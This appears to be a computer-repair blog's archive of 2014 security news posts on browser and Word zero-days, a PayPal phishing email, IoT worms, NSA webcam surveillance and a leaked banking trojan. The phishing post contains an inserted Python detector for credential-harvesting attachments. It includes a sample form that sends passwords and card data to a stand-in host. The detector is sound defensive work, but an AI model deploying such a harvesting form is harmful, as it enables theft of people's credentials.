• Tag Archives computer news
  • New Zero Day Vulnerability Found In Internet Explorer All versions


    A new zero-day vulnerability that resides in all versions of Internet Explorer has been spotted in the wild, Microsoft confirmed late Saturday.

    The vulnerability, which could allow remote code execution, is being used in “limited, targeted attacks,” according to an advisory issued by Microsoft. While all versions of the web browser, IE 6 through 11, are affected by the vulnerability, attacks are currently targeting IE versions 9, 10 and 11, according to security firm FireEye, which first reported the flaw Friday.

    The attack leverages a previously unknown “use after free” vulnerability — data corruption that occurs after memory has been released — and bypasses both Windows DEP (data execution prevention) and ASLR (address space layout randomization) protections, according to FireEye.

    The vulnerability is currently being exploited by a group of hackers targeting financial and defense organizations in the US, FireEye told CNET.

    “The APT [advanced persistent threat] group responsible for this exploit has been the first group to have access to a select number of browser-based 0-day exploits (e.g. IE, Firefox, and Flash) in the past,” FireEye said. “They are extremely proficient at lateral movement and are difficult to track, as they typically do not reuse command and control infrastructure.”

    FireEye said the flaw was significant because it affects more than a quarter of the total browser market.

    “Collectively, in 2013, the vulnerable versions of IE accounted for 26.25% of the browser market,” FireEye said in its advisory.

    An attack could be triggered by luring visitors to a specially crafted web page, Microsoft explained.

    “The vulnerability exists in the way that Internet Explorer accesses an object in memory that has been deleted or has not been properly allocated,” Microsoft said. “The vulnerability may corrupt memory in a way that could allow an attacker to execute arbitrary code in the context of the current user within Internet Explorer.”

    Microsoft said it is investigating the vulnerability and may issue an out-of-cycle security update to address the issue.

    Please visit ccrepairservices.com

    for latest computer repair and online news.

    Local and Online Virus removal and computer repairs anytime, anywhere



  • PayPal “Unauthorized Credit Card Payment” Phish

    A fake PayPal email, addressed “Dear PayPal”, with an attachment to fill in? What could possibly go wrong?


    The email reads as follows:

    Dear PayPal user,

    We recently received a report of unauthorized credit card payment attempt associated with this account. To protect you against any further unauthorised payment attempts, we’ve limited access to your PayPal account.
    Please take a minute to review the details below and what steps you need to take to remove the limits.

    ———————————–
    Details of disputed transaction
    ———————————–
    Case ID Number: PP-001-546-712-049
    ———————————–
    What to do next
    ———————————–

    Please download the form attached to this email and open it in a web browser.
    Once opened, you will be provided with steps to restore your account access.
    We appreciate your understanding as we work to ensure your account safety.

    ———————————–
    Due dates
    ———————————–
    Please get back to us as soon as possible.
    ———————————–
    Other details
    ———————————–
    There are no other details for this transaction at this time.

    Yours sincerely,
    PayPal

    Just like the spam from mid-February, this one comes with a zipped attachment:

    Case ID Number PP-001-546-712-049

    with a .html file inside called…well, you can probably guess what it’s called:

    Case ID Number PP-001-546-712-049.html


    The form asks for:

    Email address, full name, PayPal password, DOB, billing address / town, county, postcode, home phone, credit / debit card number, expiry date, security code and sort code.

     

    Of course, you shouldn’t fill this in or hit the “Send” button – just delete the attachment and send the mail to the spam folder.
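    A mail-gateway style check for the pattern described above (a zipped .html attachment whose form collects credentials and card data), added here as an example and not part of the original post. The field-name hints, the `collector.example` host and the sample form are constructed assumptions.

```python
import io
import re
import zipfile
from html.parser import HTMLParser
from urllib.parse import urlparse

# Name hints for the data this page says the form asks for (assumed naming).
SENSITIVE = re.compile(r"pass|card|cvv|cvc|security.?code|expir|sort.?code|dob|birth", re.I)

class FormCollector(HTMLParser):
    """Collect each <form>'s action and the fields declared inside it."""
    def __init__(self):
        super().__init__()
        self.forms, self.current = [], None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current = {"action": a.get("action") or "", "inputs": []}
            self.forms.append(self.current)
        elif tag in ("input", "select", "textarea") and self.current is not None:
            field = ((a.get("type") or "text").lower(), a.get("name") or "")
            self.current["inputs"].append(field)

    def handle_endtag(self, tag):
        if tag == "form":
            self.current = None

def score_html(html_text):
    """Return the reasons an HTML file looks like a credential-harvesting form."""
    parser = FormCollector()
    parser.feed(html_text)
    reasons = []
    for form in parser.forms:
        types = [t for t, _ in form["inputs"]]
        names = sorted(n for _, n in form["inputs"] if SENSITIVE.search(n))
        host = urlparse(form["action"]).hostname
        if "password" in types:
            reasons.append("password input in a local HTML file")
        if len(names) >= 2:
            reasons.append("sensitive fields: " + ", ".join(names))
        if host:
            reasons.append("form posts to remote host " + host)
    return reasons

def inspect_zip(zip_bytes, max_member_size=2_000_000):
    """Map each .html/.htm member of a zipped attachment to its findings."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith((".html", ".htm")):
                continue
            if info.file_size > max_member_size:  # declared size, checked before reading
                findings[info.filename] = ["member too large to inspect"]
                continue
            reasons = score_html(zf.read(info).decode("utf-8", errors="replace"))
            if reasons:
                findings[info.filename] = reasons
    return findings

def build_zip(name, html_text):
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(name, html_text)
    return buf.getvalue()

# Constructed sample: field names and the collector.example host are made up.
PHISH_HTML = """<form method="post" action="http://collector.example/post.php">
<input type="password" name="paypal_password"><input type="text" name="card_number">
<input type="text" name="expiry_date"><input type="text" name="security_code">
<input type="text" name="sort_code"><input type="text" name="dob"></form>"""
PHISH_ZIP = build_zip("Case ID Number PP-001-546-712-049.html", PHISH_HTML)

if __name__ == "__main__":
    print(inspect_zip(PHISH_ZIP))
```

    A legitimate HTML attachment with no form, or with a search box that posts to a relative path, produces no findings.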

    Complete Online Computer news and Repair

    WWW.CCREPAIRSERVICES.COM


  • Microsoft announces vulnerability when viewing RTF documents in Word

    Microsoft yesterday announced a new vulnerability in Word where specially crafted RTF files could cause your computer to execute commands without your permission. Microsoft Security Advisory (2953095) explains how attackers are currently using this vulnerability to execute commands on computers that open these types of RTF documents. This vulnerability also exists in Outlook if it is configured to use Word as its email viewer.

    The advisory states:


    Microsoft is aware of a vulnerability affecting supported versions of Microsoft Word. At this time, we are aware of limited, targeted attacks directed at Microsoft Word 2010. The vulnerability could allow remote code execution if a user opens a specially crafted RTF file using an affected version of Microsoft Word, or previews or opens a specially crafted RTF email message in Microsoft Outlook while using Microsoft Word as the email viewer. An attacker who successfully exploited the vulnerability could gain the same user rights as the current user.

    At this point there is no patch available, but Microsoft has released a Fixit that can be used to disable the opening of RTF content in Word. This fixit should be used by all users of Word until an official patch is released.



  • Linux Worm targets Internet-enabled Home appliances to mine Cryptocurrencies

    Could a perfectly innocent-looking device like a router, TV set-top box or security camera mine Bitcoins? YES! Hackers are not going to spare smart Internet-enabled devices.

    A Linux worm named Linux.Darlloz, earlier used to target Internet of Things (IoT) devices, i.e. home routers, set-top boxes, security cameras, printers and industrial control systems, has now been upgraded to mine cryptocurrencies like Bitcoin.

    Security researchers at antivirus firm Symantec spotted the Darlloz Linux worm back in November, and they spotted the latest variant of the worm in mid-January this year.

    Linux.Darlloz exploits a PHP vulnerability (CVE-2012-1823) to propagate and is capable of infecting devices that run Linux on Intel’s x86 chip architecture and on other embedded device architectures such as PPC, MIPS and MIPSEL.

    The latest variant of Linux.Darlloz is equipped with an open source cryptocurrency mining tool called ‘cpuminer’, which could be used to mine Mincoins, Dogecoins or Bitcoins.

    Symantec researchers scanned the entire address space of the Internet and found 31,716 devices infected with Darlloz. “By the end of February 2014, the attacker mined 42,438 Dogecoins (approximately US$46 at the time of writing) and 282 Mincoins (approximately US$150 at the time of writing). These amounts are relatively low for the average cybercrime activity so, we expect the attacker to continue to evolve their threat for increased monetization,” said Kaoru Hayashi, senior development manager and threat analyst with Symantec in Japan.

    Major infected countries are China, the U.S., South Korea, Taiwan and India.


    Cryptocurrency mining typically requires more memory and a powerful CPU, so the malware could be updated to target other IoT devices in the future, such as home automation devices and wearable technology.

    A few weeks back, Cisco announced a global and industry-wide initiative to bring the security community and researchers together to contribute to securing the Internet of Things (IoT), and launched a contest called the “Internet of Things Grand Security Challenge”, offering prizes of up to $300,000 for winners.

    Users are advised to update firmware and apply security patches for all software installed on computers or Internet-enabled devices. Make sure you are not using the default username or password on any device, and block port 23 or 80 from outside if not required.



  • HP expected to announce 3D printers in June: durability issues resolved, says Whitman

     Hewlett Packard will outline plans to enter the commercial 3D-printing market in June, saying it has solved a number of technical problems that have hindered broader adoption of the high-tech manufacturing process.

    Chief executive Meg Whitman told shareholders on Tuesday the company will make a “big technology announcement” this month around how it will approach a market that has excited the imagination of investors and consumers alike.

    However, critics have accused the sci-fi-like technology of being over-hyped and still too immature for widespread consumer adoption.

    Industry observers have long expected HP, a dominant force in global printer manufacturing, to eventually get into the business. Whitman said HP’s in-house researchers have resolved limitations involved with the quality of substrates used in the process, which affects the durability of finished products.

    “We actually think we’ve solved these problems,” Whitman told an annual shareholders meeting. “The bigger market is going to be in the enterprise space,” manufacturing parts and prototypes in ways that were not possible before.

    “We’re on the case,” she said without elaborating.

    HP executives have estimated that worldwide sales of 3D printers and related software and services will grow to almost $11 billion (AUD$12.2 billion) by 2021 from a mere $2.2 billion in 2012.

    The nascent 3D-printing market is now dominated by a number of smaller players like MakerBot, a unit of Stratasys that is concentrating on selling more affordable devices to consumers.

    Contract manufacturers like Flextronics however already use the technology to help craft prototype parts or devices for corporate clients.

    “HP is currently exploring the many possibilities of 3D printing and the company will play an important role in its development,” CTO and HP Labs director Martin Fink said in a February blogpost on HP’s website.

    “The fact is that 3D printing is really still an immature technology, but it has a magical aura. The sci-fi movie idea that you can magically create things on command makes the idea of 3D printing really compelling for people.”

     



  • Ex-Microsoft employee charged with leaking trade secrets

    Allegedly gave pre-release Windows info to a blogger.

    A former employee of Microsoft is facing criminal charges after he allegedly passed trade secrets to a blogger in France, US court documents showed.

    Russian national Alex Kibkalo, a former Microsoft employee in Lebanon and Russia, admitted to Microsoft investigators that he provided confidential company documents and information to the blogger, documents from a Seattle federal court showed.

    The blogger, who was not identified, was known to those in the Microsoft blogging community for posting screenshots of pre-release versions of the Windows operating system. The blogger hid his identity, stating falsely that he was from Quebec, according to the documents.

    An internal investigation by Microsoft revealed unauthorised transmissions of proprietary and confidential trade secrets, according to the court documents. An email from Kibkalo was found within the blogger’s Hotmail account, establishing that he shared confidential data.

    “We take protection of our intellectual property very seriously, including cooperating with law-enforcement agencies who are investigating potential criminal actions by our employees or others,” a Microsoft spokesman said in a statement.

    A lawyer representing Kibkalo could not be reached for comment immediately.

    The court documents said during interviews, the blogger admitted to posting information on Twitter and his websites and selling Windows Server activation keys on eBay.

    According to Microsoft’s investigation, in July and August 2012, Kibkalo uploaded proprietary software including pre-release software updates of Windows 8 RT, as well as the Microsoft Activation Server Software Development Kit (SDK) to a computer in Washington and subsequently to his personal Windows Live SkyDrive account.

    Kibkalo, who worked with Microsoft for seven years, received a poor performance review in 2012 and threatened to resign if the review was not amended, the documents showed.

    According to an FBI agent who was part of the investigation, Kibkalo has relocated to Russia and based on a LinkedIn account, he is currently working for another US-based technology company with offices in Moscow and St. Petersburg.

     



  • Facebook ‘Watch naked video of friends’ Malware scam infects 2 million users


    We have seen a lot of Facebook malware and virus infections spreading through friends lists, and this time a new clickjacking scam campaign is going viral on Facebook.

    Hackers spam Facebook timelines with a friend’s picture and “See (Friend)’s naked video,” or “(Friend Name’s) Private Video.”

    The picture appears to be uploaded by a friend and, definitely, you might want to see some of your Facebook friends naked. But beware! If you get curious and click, you will be redirected to a malicious website that reports that your Flash Player is not working properly and needs to be re-installed.

    But in actuality it will install malware on your system and, once approved, several disguised things can happen to you. It further installs a malicious browser extension to spread the scam and steal users’ photos.


    “When the link is clicked, users are sent to a very realistic-looking mockup of a YouTube page, where the hackers will try to immediately install the Malware Trojan.”

    So, don’t click it! According to the report, 2 million Facebook users are already infected by the same malware campaign and unknowingly flood their friends’ timelines with the same campaign. Clicking on the message will automatically publish the same link on the victim’s Facebook wall, potentially allowing friends to click on it.

    Malware often takes advantage of the fact that you trust your friends. So, keep an eye on the links and messages from your friends, and if in doubt, ask them whether they actually sent you something or not.

    The recent malware attacks are just a few examples of the dangers of using the social network Facebook. Stay safe by keeping your browser up-to-date and installing operating system updates when they are released. Please ensure you share this news with your Facebook friends to make all of them aware of it.

     



  • Microsoft will Alert Windows XP users to Upgrade

    In case you didn’t know already, Microsoft will be dropping support for Windows XP (SP3) and Office 2003 on April 8, 2014. From this date onwards, Microsoft will no longer provide new security updates, non-security hotfixes, free or paid assisted support options or online technical content updates.

    As such, use of Windows XP after this date (on non-isolated systems) is strongly discouraged. Indeed, to encourage PC owners to upgrade from Windows XP, Microsoft will be presenting an official notification on the desktop of those Windows XP customers who are using the Home or Professional editions and who have elected to receive updates via Windows Update.

    The notification will look like this:

    [Image: screenshot of the notification]

    Note: this is a genuine notification and not a symptom of malware (which often uses similar-looking prompts to entice a user to download further malicious software).

    Microsoft have also partnered with Laplink to provide Windows XP users with a free data migration tool called PCmover Express. This tool for Windows XP will copy over your files and settings from your Windows XP PC to a new device running Windows 7, Windows 8 or Windows 8.1. It will be available for download from windowsxp.com soon.

     



  • Windows 8 had more vulnerabilities than previous versions of Windows

    Microsoft’s Windows 8 platform has been tagged by security research firm Secunia as being the most vulnerable Windows platform on the market… According to their research, Windows 8 had more vulnerabilities than previous versions of Windows that are currently supported by Microsoft for 2013… The answer is quite simple: Flash. Because Flash is now baked into the modern instance of IE, any Flash vulnerability can now be tied into Windows 8 as well.


    Visit www.ccrepairservices.com for all latest computer repair and related news online


  • Dirty NSA hacked into Webcam of millions of Yahoo users for Private images

    Once again, a new revelation has shown the ugly side of governments that conduct global mass surveillance. Previous documents leaked by the whistleblower Edward Snowden have already tarnished the US intelligence agency NSA, which was running a number of projects like PRISM, XKeyscore, DROPOUTJEEP, and various others to carry out surveillance of millions of people.

    Now, it has been revealed that the US National Security Agency (NSA) helped its British counterpart, the Government Communications Headquarters (GCHQ), to allegedly capture and store nude and other images from the webcam chats of millions of unsuspecting Yahoo users, The Guardian reported.

    Documents handed to the Guardian by the former NSA contractor Edward Snowden show that GCHQ worked with the US intelligence agency NSA on a joint project dubbed ‘Optic Nerve’. The project carried out a bulk surveillance program, under which they nabbed webcam images every five minutes from random Yahoo users’ video chats and stored them in a database.

    The project didn’t target individual users; rather it targeted Yahoo webcam chats between 2008 and 2010. Indeed, the method of collection appears somewhat reckless: in one six-month period in 2008 alone, still images of about 1.8 million users were captured and stored on government servers.

    Instead of saving full videos, the program logged one image every five minutes from a user’s chat. The document says that between 3 and 11 percent of the images taken contain “undesirable nudity.”

    One GCHQ document states, “It would appear that a surprising number of people use webcam conversations to show intimate parts of their body to the other person.”

    The collected webcam information was stored in the NSA’s XKeyscore search tool, and NSA research was used to build the tool which identified Yahoo’s webcam traffic, reads the report.


    GCHQ’s webcam spying program, Optic Nerve, was still active in 2012, according to an internal GCHQ wiki page accessed that year.

    Why Images??? It is known from the revealed documents that the images were collected by the government agency so that the group could experiment with facial recognition.

    “Face detection has the potential to aid selection of useful images for ‘mugshots’ or even for face recognition by assessing the angle of the face,” it reads. “The best images are ones where the person is facing the camera with their face upright.”


    GCHQ staff were allowed to display “webcam images associated with similar Yahoo identifiers to your known target”, the document reads; it also states “Bulk surveillance of Yahoo users was begun” as “Yahoo webcam is known to be used by GCHQ targets.”

    Not surprising, because your naughty private webcam sex session you loved and enjoyed with your lover four years back was potentially pored over by the suits at GCHQ.

    Yahoo has reacted furiously and denied any prior knowledge of the webcam interception program, and said that it had no awareness of or involvement with the GCHQ collection, describing the activity as “a whole new level of violation of our users’ privacy.”

    And a GCHQ spokesman said in a statement, “It is a longstanding policy that we do not comment on intelligence matters. Furthermore, all of GCHQ’s work is carried out in accordance with a strict legal and policy framework which ensures that our activities are authorized, necessary and proportionate, and that there is rigorous oversight, including from the secretary of state, the interception and intelligence service commissioners and the Parliamentary Intelligence and Security Committee,” adding, “All our operational processes rigorously support this position.”

    The NSA spokesperson declined to respond, saying, “As we’ve said before, the National Security Agency does not ask its foreign partners to undertake any intelligence activity that the US government would be legally prohibited from undertaking it.”

    This is how our privacy is getting ruined by the government intelligence officials that we all trust blindly.

    Latest Computer news and virus and malware threats at Complete computer Repair Services Fort Lauderdale and all South Florida Latest Computer News and Repair Services

    www.ccrepairservices.com


  • Android iBanking Trojan Source Code LEAKED ONLINE

    A smartphone is a necessity for everyone today, and so it is the first target of most cybercriminals. Malware authors are getting to know their market and are changing their way of operations. Since last year we have seen a rise in the number of hackers moving from the Blackhat into the Greyhat.

    iBanking, a new mobile banking Trojan app that poses as an Android ‘Security App’ in order to deceive its victims, may threaten a large number of users now that its source code has been leaked online through an underground forum.

    It will give an opportunity to a larger number of cybercriminals to launch attacks using this kind of ready-made mobile malware in the future.

     

    Many banking sites use two-factor authentication and transaction authorization systems to deal with various threats, sending unique one-time-use codes to their customers’ registered phone numbers via SMS. In order to defraud those customers, cybercriminals have started to create mobile malware like iBanking to serve their purpose.

    In addition, iBanking is used together with computer malware to defeat the mobile-based security mechanisms used by the banking sites.

    “Apart from the server-side source-code, the leaked files also include a builder that can un-pack the existing iBanking APK file and re-pack it with different configurations, essentially providing fraudsters with the means to create their own unique application,” added Daniel Cohen.

    In addition to SMS sniffing, the iBanking app allows an attacker to redirect calls to any pre-defined phone number, capture audio using the device’s microphone and steal other confidential data like the call history log and phone book contacts.

    During the installation process, the malicious app attempts to social-engineer the user into providing it with administrative rights, making its removal much more difficult.



  • Mass Exploit of Linksys Routers

    It has been revealed that a vulnerability in possibly 23 different models of Linksys (Belkin) routers has been exploited by a worm known as The Moon.

     

    The exploit was first noticed about a week ago and reported by the Internet Storm Center. The worm bypasses authentication on the router to take control. Linksys states that “the router starts flooding the network with ports 80 and 8080 outbound traffic, resulting in heavy data activity”. The worm also attempts to detect any vulnerable systems on the router’s network for exploitation.

     

    Current intentions of The Moon are not yet known, however, there is code within the worm which seems to suggest that it may be gathering infected routers into a network of compromised devices through a command and control system.

     

    Linksys will be issuing a firmware update to fix the vulnerability in the next few weeks. But for now, if you’re using a Linksys router, you should read the advice given here to disable Remote Access Management.

     
